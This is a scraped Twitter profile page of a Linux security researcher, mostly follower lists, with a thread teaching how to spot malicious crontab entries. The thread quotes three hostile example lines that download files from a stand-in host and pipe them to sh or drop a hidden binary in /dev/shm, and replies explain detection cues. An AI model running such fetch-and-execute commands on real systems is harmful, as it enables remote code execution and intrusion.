Craig Rowland - Agentless Linux Security @CraigHRowland
Agentless Linux security and incident response. Linux malware, digital forensics, intrusion detection, and long nights. Founder @SandflySecurity. sandflysecurity.com Christchurch City, New Zealand Joined October 2018-
Tweets3K
-
Followers7K
-
Following286
-
Likes2K
This is also what I recommend to flag any scheduled task with curl or wget regardless of what it is doing. I'll tell you a story why you shouldn't use wget/curl in scheduled tasks on Linux. This mistake helped me break into a network one time.
This is also what I recommend to flag any scheduled task with curl or wget regardless of what it is doing. I'll tell you a story why you shouldn't use wget/curl in scheduled tasks on Linux. This mistake helped me break into a network one time.
Let's discuss malicious crontab on Linux. What parts of these entries are suspicious? wget -O - -q hxxp://www.example.com/pics/logo.jpg|sh curl hxxp://www.example.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh wget hxxp://www.example.com/x86_64 -O /dev/shm/.blah
There are many right answers about these. Let's see how many people see. We'll discuss them in detail a little later.
There are many right answers about these. Let's see how many people see. We'll discuss them in detail a little later.
Florian Roth @cyb3rops
180K Followers 2K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇Ali Hadi | B!n@ry @binaryz0ne
29K Followers 568 Following DFIR and Adversary Simulation | DFIR @ ProtonMail | Perfect Stranger | Stronger Together |0xor0ne @0xor0ne
55K Followers 525 Following | CyberSecurity | Reverse Engineering | C and Rust | Exploit | Linux kernel | PhD | My Tweets, My Opinions :) |Justin Elze @HackingLZ
52K Followers 5K Following Hacker/CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race carsSentinelOne @SentinelOne
52K Followers 1K Following ONE autonomous platform to prevent, detect, respond, and hunt. Do more, save time, secure your enterprise: https://t.co/N75g1HAnCs 🐱💻Kostas @Kostastsale
16K Followers 364 Following @TheDFIRReport member | Tweeting and following mostly #ThreatIntel,#malware,#IR & #Threat_Hunting. Opinions are mine only! 🇬🇷🇨🇦Chad Tilbury @chadtilbury
23K Followers 624 Following Digital forensics and incident response. Ex-AFOSI, Mandiant, and CrowdStrike. SANS Institute Fellow and co-author of #FOR500 and #FOR508 courses.Samir @SBousseaden
24K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]Will @BushidoToken
29K Followers 3K Following Threat Intel & Hunting @Equinix | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | @darknetdiaries #126: REvilClandestine @akaclandestine
35K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting |Adam @Hexacorn
24K Followers 1K Following Red Brain, Blue Fingers [email protected] https://t.co/Bm0C9KQDDY RIP TwitterNasreddine Benchercha.. @nas_bench
10K Followers 1K Following Detection @nextronsystems | @sigma_hq & LOLDrivers maintainer | Avid learner and passionate about all things #Detection #SigmaHoshi @ljigen369
19 Followers 357 FollowingSusan Lasley @siouxie12
13 Followers 122 Followingus_Gabriella_ @UsGabriell51720
31 Followers 2K FollowingTrey @Yert012
1 Followers 16 FollowingKadir Crk @MehmetKadirCrk1
24 Followers 176 FollowingQui3t @Qui3t_Org
132 Followers 212 Following We are a small group of nerds who are focused on exposing online predators with the goal of creating a better future for the next generation.Czentye Levente @lordlewo
22 Followers 3K FollowingDanila Lutsiv @Chemrid
210 Followers 3K Followingsignalblur📡🛸 @signalblur
59 Followers 383 Following Founder @ Signalblur Cyber Threat Intelligence, parked - find me on mastodon @ https://t.co/PDJPhsbMxKYogesh Mavani @yogesh_mavani
12 Followers 183 FollowingTyler Fisher @WhitfieldsDad
0 Followers 103 Following Red + purple + green team at ███, former EDR and vulnerability scanner developer at Rapid7. Working on BAS + control effectiveness + compliance attestation.John Sanders @Sandman46615
155 Followers 1K FollowingHit Bull Win Steak Tw.. @misternaxal
892 Followers 5K Following Assistant Associate Deputy Vice Chancellor, DEI, Musk UniversitySean McCarrey @MccarreySean
99 Followers 2K FollowingImSkaarz @ImSkaarz
0 Followers 311 FollowingJohn Yandziak @jyandziak
2K Followers 4K Following 🇺🇸🇧🇷, Solutions Architect Manager at Palo Alto Networks Kubernetes, Containers, Cloud Foundry, DevEx, Security and Philly Sports #RingTheBellJames Clark @citcsmobile
890 Followers 1K Following randomly working on projects like plotting, 3d printing and laser cutting. also, mental.Brandon @bgrindat
74 Followers 661 Following Interested in all things physical and cyber security. Martial arts enthusiast, gym rat, tinkerer, and chess player.aryo d @aryode
106 Followers 638 FollowingAthena @Athena1533567
21 Followers 2K FollowingWin Treese @wintreese
263 Followers 804 Following Software consultant, including software in litigation. @[email protected]. Poetry at https://t.co/tlycV4UGyl~ff @breatheCO2flor
2 Followers 74 FollowingKili @kilijanek
702 Followers 2K Following I don't know anything about: computers, security or IT. 406b696c696a616e656b40696e666f7365632e65786368616e6765 My tweets are my own opinions.danjconn @danjconn
347 Followers 871 Following ❤️s Hax, Code, Music, Runs, Drinks. Chaos Monkey. London Marathon 🏃- 5:56:37 BCS / ACM / OWASP / OpenUK member. Personal Acc.Belarchaoui Youcef @BelarchaouiY
103 Followers 565 Following Cyber Security Engineer . Penetration Tester | DFIR | Bug Hunter owner of cve-2022-35728tweet hunter @tweethunte59710
0 Followers 6 FollowingMuhammad Hendro @hendro_jun
355 Followers 2K FollowingFaith Hazelwood @faithhaze13
61 Followers 398 FollowingKicky Fast @KickyFast1
39 Followers 376 Following Art Director/Project Manager - Changing Careers to the Tech world (again) and continuing my love of creating (drawing,painting,etc). Just want to enjoy life!The last scholar of G.. @Karsiistihbarat
131 Followers 520 Following Rickest Rick Narin cat-fem boi 😸😸😽😸 A different kind of Rick, I guess. https://t.co/bdBE0NIHh9 https://t.co/hIPVWYbU6p fetöAlejandro Mazuera-Roz.. @amazuerar
134 Followers 294 Following Casual photographer, rookie hiker & linguistics enthusiastNanoVMs @nanovms
1K Followers 2K Following NanoVMs - no users, no login, single application unikernel vms. Protecting everyones cloud. Faster than Docker, Faster than Linux.Naman Devnani @naman_devnani
328 Followers 5K Following Security Researcher | Purple Team | Bug Hunter | CTF Player | Science & Tech Enthusiast | R&D | All-Source Intelligence | CAP | DCSP | TTIA | BCDETom Wim @Wito137616
2 Followers 7 Following你压到我腿毛了 @nydowtumol19593
182 Followers 3K FollowingAnatoly Karp @akarp
2K Followers 3K Following MySQL Infra at Meta. Method coder. Discreet mathematician. Rust. Machine learning, physics, economics.Ettore Conte @EttoreConte
34 Followers 387 FollowingSnayle95 @Snayle95
34 Followers 154 Following Passionné par l'actu cyber et les nouvelles technos 💻 Meme crafter à mes heures perdues 🤡Aakash Tewari @aakashtewari03
1 Followers 17 FollowingKunal Verma @KunalVerma2051
10 Followers 628 FollowingNum @ii6934
0 Followers 358 FollowingRz0 @Rz0xx
0 Followers 38 Following.... @holahlajshdhg
13 Followers 129 Followingvx-underground @vxunderground
291K Followers 210 Following The largest collection of malware source code, samples, and papers on the internet. Password: infectedFlorian Roth @cyb3rops
180K Followers 2K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇Ali Hadi | B!n@ry @binaryz0ne
29K Followers 568 Following DFIR and Adversary Simulation | DFIR @ ProtonMail | Perfect Stranger | Stronger Together |0xor0ne @0xor0ne
55K Followers 525 Following | CyberSecurity | Reverse Engineering | C and Rust | Exploit | Linux kernel | PhD | My Tweets, My Opinions :) |Justin Elze @HackingLZ
52K Followers 5K Following Hacker/CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race carsDave Kennedy @HackingDave
207K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Podcast. Fam First/Hacker/CSO/USMC/Intel/Fitness. Motto: Make world a better placeNicolas Krassas @Dinosn
122K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3DebugPrivilege @DebugPrivilege
37K Followers 2K Following Security “Researcher” | Former Microsoft MVP | All Tweets are my opinions and thoughts. Interested in Security, Debugging, and Troubleshooting.Chris Sanders 🔎 �.. @chrissanders88
32K Followers 505 Following Ed.D. | Founder @networkdefense @RuralTechFund | Former @Mandiant, DoD | Author: Intrusion Detection Honeypots, Practical Packet Analysis, Applied NSMKostas @Kostastsale
16K Followers 364 Following @TheDFIRReport member | Tweeting and following mostly #ThreatIntel,#malware,#IR & #Threat_Hunting. Opinions are mine only! 🇬🇷🇨🇦Chad Tilbury @chadtilbury
23K Followers 624 Following Digital forensics and incident response. Ex-AFOSI, Mandiant, and CrowdStrike. SANS Institute Fellow and co-author of #FOR500 and #FOR508 courses.BleepingComputer @BleepinComputer
212K Followers 175 Following Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!Samir @SBousseaden
24K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]The DFIR Report @TheDFIRReport
53K Followers 0 Following Real Intrusions by Real Attackers, the Truth Behind the Intrusion. Services: https://t.co/XW613EKt2wMick Douglas 🇺🇦.. @bettersafetynet
26K Followers 571 Following Consultant for InfoSec Innovations | @SANSInstitute Principal Instructor | @IANS_Security Faculty | I like information security. How about you?Will @BushidoToken
29K Followers 3K Following Threat Intel & Hunting @Equinix | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | @darknetdiaries #126: REvilClandestine @akaclandestine
35K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting |The Hacker News @TheHackersNews
913K Followers 2K Following #1 Most trusted publication for breaking cybersecurity and hacking news, insights, and analysis for information security professionals.signalblur📡🛸 @signalblur
59 Followers 383 Following Founder @ Signalblur Cyber Threat Intelligence, parked - find me on mastodon @ https://t.co/PDJPhsbMxKExecuteMalware @executemalware
26K Followers 190 Following #malware hunter & analyst. Opinions are my own.Eugene Kaspersky @e_kaspersky
187K Followers 8K Following CEO of @Kaspersky. 30+ years in #cybersecurity. Views are my ownStrongFirst @BeStrongFirst
22K Followers 110 Following The school of strength, led by Pavel Tsatsouline. Barbell, Kettlebell, Bodyweight. StrongFirst.Marius 'f0wL' Genheim.. @f0wlsec
3K Followers 2K Following Malware REsearch/DFIR @SI_FalconTeam | Staff @vxunderground (Malware & APT Curation) | @chaosdarmstadt | @[email protected]Open Source Security .. @oss_security
4K Followers 11 Following @Openwall oss-security mailing list thread summaries, currently maintained by @solardiz. Originally setup and maintained as an automated feed by @eugeneteo.Bad Sector Labs @badsectorlabs
6K Followers 440 Following Cybersecurity news, techniques, exploits, and tools every week at https://t.co/UgKmeEEjIV 🐘 @[email protected]Sorenson Capital @SorensonCap
856 Followers 782 Following Early and late-stage venture capital firm investing in product-oriented B2B software companiesHaxRob @haxrob
16K Followers 378 Following I enjoy breaking things. Telco / mobile and IoT security. Surfing the information super highway one keystroke at a time.ميمز سكيورت.. @m3m353c
13K Followers 2 Following هكر محب الخير أنزل شروحات وأخبار ومعلومات تفيدك. #القبعة_السوداء 🎓 سوي ريتويتIs Now on VT! @Now_on_VT
1K Followers 258 Following Get notified when interesting APT/FIN indicators of compromise appear on https://t.co/Sb3PFMresB. A project by @craiuJustin Ibarra @br0k3ns0und
1K Followers 796 Following threat research & detection engineering lead @elastic by way of @endgameinc | compulsive heavy iron displacer | I always like my own tweetsJason Lang @curi0usJack
15K Followers 195 Following @TrustedSec Red Team | Hi-Fidelity trolling | Privacy Enthusiast | Putting the "no" in nano | Avatar: https://t.co/3XHmKR8VrSValueStockGeek @ValueStockGeek
69K Followers 3K Following DIY value investor. Blog & podcast: https://t.co/afz9RYcUq6 My asset allocation strategy: https://t.co/ZhLOYkiw5HDominik Penner @zer0pwn
6K Followers 2K Following principal security consultant @mandconsulting_. former ssc @nccgroupinfosec. co-founder @hackerschange. vulnerability researcher in the pursuit of knowledgeWill Dormann @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. @[email protected]Stiv Kupchik @kupsul
309 Followers 73 Following Security Researcher @ Akamai during the day, Physics student during the nightAura @SecurityAura
4K Followers 539 Following GCIH, GCFE | Manager | DFIR, Threat Hunting, Detection Engineering | @CuratedIntel Contributing DFIR Member https://t.co/foDR8PkDI7Toby Lewis @tobaslouis
456 Followers 890 Following Global Head of Threat Analysis at @Darktrace. Previously @NCSC. All things Cyber Security Ops, Threat Hunting, Threat Intel and Incident Mgmt.Dan Teal @DanielTeal
109 Followers 299 Following Computer security professional for 35 years / USAF veteran / Husband / Father / Catholic / Engineer / Mentor / CoachKyle Cucci @d4rksystem
4K Followers 488 Following Threat Research @proofpoint | Author of "Evasive Malware" @nostarch | Talks about cybercrime, threat intel, and malware stuff.Clout Repellent @simplylurking2
524 Followers 762 FollowingCostin Raiu @craiu
38K Followers 7K Following Romanian antihacker from another planet. #threatintel #yara #chess #taekwondoSergey Lozhkin @61ack1ynx
1K Followers 455 Following Principal Security Researcher at @kaspersky Global Research and Analysis TeamKim Zetter @KimZetter
95K Followers 3K Following Journalist - cyber/national security. Author - COUNTDOWN TO ZERO DAY: Stuxnet and the Launch of the World's First Digital Weapon. https://t.co/334DzfSL1fr00t killah @r00tkillah
2K Followers 686 Following red @ Oracle Cloud Infrastructure ☁️🐚@⚖️; hacker; opinions my own; he/himtaha @lordx64
7K Followers 5K Following I blog about exploits & malware here : https://t.co/VMeOE55UPA maintainer of Threat Intel Bot GPT https://t.co/T1cvuWHqueRocky Enterprise Soft.. @resforg
1K Followers 104 Following The home of Free and Open Source Enterprise SoftwareRocky Linux @rocky_linux
18K Followers 116 Following #RockyLinux is a community Enterprise Linux distribution for everything from desktops to hyperscale! | 🏛️ @resforg | 🐘 @[email protected]Solar Designer @solardiz
14K Followers 1K Following @Openwall founder, @oss_security maintainer, @lkrg_org co-author. RTs don't imply agreement with points of view.Steven Folek @Pir00t
484 Followers 2K Following *insert caffeine to start* | Principal Threat Intelligence Analyst | DFIR | CTI | RE dabbler | Odd bit of banter | RT ≠ endorsementsAlmaLinux @AlmaLinux
9K Followers 218 Following The only 100% community owned and governed enterprise-grade Linux Distribution and RHEL/CentOS alternative. Open Source, forever-free and production ready.Austin Larsen @AustinLarsen_
700 Followers 812 Following Incident Response and APTs @Google/@Mandiant | Opinions are my ownocdsec @0xocdsec
3K Followers 4K FollowingJose Enrique Hernande.. @_josehelps
3K Followers 2K Following 🛡️ Threat Research Director @Splunk ❤️ Scuba Diving 🔧 Maintainer of #AtomicRedTeam & #LOLDRIVERS & #LOLBAS project 😎 Ex @lacework @fastly @oracle @akamai.MISP (@misp@misp-comm.. @MISPProject
23K Followers 97 Following MISP - Threat Sharing. An open source software and standards to share, create and validate threatintel and intelligence. Mastodon @[email protected]Pierluigi Paganini - .. @securityaffairs
37K Followers 4K Following Founder of Security Affairs, CYBHORUS, and Cybaze. Member Ad-Hoc Working Group on Cyber Threat Landscapes, Ethical Hacker, Security Evangelist, Security AnalystOlivier Lamotte @olamotte33
485 Followers 3K Following French nerdy tech-enthusiast, nature and music lover, learning new things everyday ! Information security Offense, Defense, and a whole lot of ranting.PortcullisLabs @portcullislabs
2K Followers 5K Following Portcullis Labs is the R&D arm of @cisco's Security Advisory team in EMEA. Follow our journey at https://t.co/BIbV67locX.Mysk 🇨🇦🇩🇪 @mysk_co
13K Followers 460 Following We're two #iOS developers and occasional #security researchers on two continents. #CyberSecurity 🎬 https://t.co/JGKIHaSEgs 📝https://t.co/69k7WAGSBT 🇨🇦🇩🇪Christopher Peacock @SecurePeacock
6K Followers 2K Following Purple & Blue Teamer | Ex @RaytheonTech, @SCYTHE_IO, & @GD_OTS | BlackHat Course Author & Instructor | DEFCON #PurpleTeam Workshops | #100DaysofSigmacr0 @ PurpleLabs @cr0nym
1K Followers 1K Following Focus on Linux Attack, Detection, Forensics, Incident Response, Threat Hunting. PurpleLabs Cyber Range. Learning hard every single day.ɯɹoʇsuoı @ionstorm
3K Followers 5K Following Cyber Defense Architect #DFIR #SIEM #Graylog #Kafka #Sysmon #Yara #Sigma #AI #Humio #LogScale #EDR #SOC Glory to Ukraine! 🌻Soumyani1 @reveng007
1K Followers 1K Following Wannabe MalDev/RedTeam | Content absorber | CRTP | Upcoming @vulncon Trainer | @BlackHatEvents Asia Arsenal Presenter | @BSidesSG Speaker | 22 y/o | he/himThe best .bat payload nowadays might just be a single curl command to drop a lnk into the startup folder 🥴
@CraigHRowland @lcamtuf IRC is evil. It led straight to facebook.
Recently came across this obfuscation tool being abused in the wild: github.com/DARKNOSY/Rush-… Detection ops: A YARA rule looking for Rush-PowerShell-Obfuscator Large PS1 files - the obfuscation seems to produce PS1 files over 10Mb which is rare in and of itself #CTI…
fyi: ESX, PanOS, and many other devices have gdb installed by default. There are always sneakier ways to stage..
Did you guy know that Linux is so Developer-Oriented that it has a special folder called /dev/ where you are suppose to develop all your projects? It's true, check it on your Distro!
As I’ve said before, I do not login to any of my Crown Jewel accounts (email, work, twitter, banking) on anything I don’t own and have complete confidence in. Because of stuff like this. Be very skeptical always. This is your entire electronic life we’re talking about.
A novel attack on Android TVs, where people might sign into their Google account in an Airbnb or an office. Usually they're locked down, but by downloading other software an attacker can access the entire contents of the Google account, email, drive, more 404media.co/android-tvs-ca…
another one 👩🔬 h/t @HackingLZ 🧊 blog.talosintelligence.com/arcanedoor-new…
testing in prod. 👩🔬
Third one: saving a file to /dev/shm, having a binary starting with a literal . (Making it hidden) and its execution, and if it were to execute - new process execution out of /dev/shm 😁 Lots of good detectors from one tweet!
I don’t use twitter too much these days (check my mastodon) but: first one: wget executing an “image” / wget flat out trying to pull an image file (how often would you really need to do that?) Second one: curl pulling an image, using dd on an image file, and executing an image
Let's discuss malicious crontab on Linux. What parts of these entries are suspicious? wget -O - -q hxxp://www.example.com/pics/logo.jpg|sh curl hxxp://www.example.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh wget hxxp://www.example.com/x86_64 -O /dev/shm/.blah
@CraigHRowland The entire thing. It's not supposed to be in crontab but in a script that is referenced within crontab...
@CraigHRowland Piping jpg into sh? Why that? curl output pipe into dd and then sh - looks strange. Piping output from a download into /dev/shm may create funny results.
@SaltinDeadsec @CraigHRowland If the attacker can update the system crontab, then they have already elevated to root.
@CraigHRowland All of them. Why do you have a crontab that pulls a document from the internet? That alone is very suspicious. Most software would run a program or script to do an update check, not just a single wget. 1. executes the file as a shell script. 2. skips 2446 bytes then…
@CraigHRowland I honestly alert on every single instance of crond calling either wget or curl with http in the command line with a few IP+domain exclusions. Completely manageable volume to poke through even with a massive nix env. Fires maybe only once a month or so.
Sandfly 5.0 runs on Ubiquiti routers agentlessly with full compromise detection features, including our new drift detection to find any unexpected changes.
Russian hackers hijack Ubiquiti routers to launch stealthy attacks - @serghei bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…
Our agentless drift detection can do file integrity monitoring on Linux, plus much more. Watch a demo where we find a PHP backdoor and malicious change to the Linux system binary directory. We can do this instantly without loading any endpoint agents. youtube.com/watch?v=yDdmLr…
We've summarized the SSH XZ backdoor attack with detection strategies for Linux in the article below. sandflysecurity.com/blog/xz-ssh-ba…